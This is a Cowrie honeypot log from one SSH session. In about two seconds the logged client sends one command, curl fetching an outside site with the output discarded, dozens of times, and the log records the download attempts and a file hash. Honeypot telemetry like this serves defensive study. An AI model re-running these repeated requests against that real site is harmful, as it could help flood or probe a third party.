{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:45.449613Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:45.450447Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:45.492558Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:45.493429Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:45.540205Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:45.541009Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:45.578892Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:45.579740Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:45.618838Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:45.619628Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:45.630303Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:45.641866Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:45.656727Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:45.657504Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:45.676258Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:45.711202Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:45.711968Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:45.757851Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:45.758697Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:45.800481Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:45.801188Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:45.839025Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:45.839697Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:45.877229Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:45.877940Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:45.916797Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:45.917507Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:45.965742Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:45.966509Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:46.006314Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:46.007177Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:46.045345Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:46.046036Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:46.083399Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:46.084140Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:46.122396Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:46.123104Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:46.131222Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:46.163013Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:46.164132Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:46.165249Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:46.213468Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:46.214317Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:46.252425Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:46.253216Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:46.292432Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:46.293404Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:46.300240Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:46.332242Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:46.332998Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:46.388706Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:46.395694Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:46.396816Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:46.420213Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:46.435011Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:46.435791Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:46.471167Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:46.475130Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:46.475805Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:46.512942Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:46.514040Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:46.540857Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:46.551395Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:46.552190Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:46.591472Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:46.592193Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:46.638748Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:46.639554Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:46.678025Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:46.678812Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:46.716574Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:46.717335Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:46.757430Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:46.758139Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:46.792932Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:46.806625Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:46.807338Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:46.844577Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:46.845294Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:46.882026Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:46.882856Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:46.909732Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:46.919924Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:46.920653Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:46.958563Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:46.959300Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:46.997982Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:46.998825Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:47.043831Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:47.044375Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:47.080630Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:47.082336Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:47.083167Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:47.122507Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:47.123283Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:47.161067Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:47.161810Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:47.216411Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:47.217146Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download.failed","url":"https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:47.227938Z","message":"Attempt to download file(s) from URL (https://ladamoscow.com/) failed","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:47.255075Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:47.255857Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:47.293938Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:47.294990Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:47.332482Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:47.333235Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:47.372538Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:47.373875Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:47.411280Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:47.412012Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:47.449652Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:47.450404Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
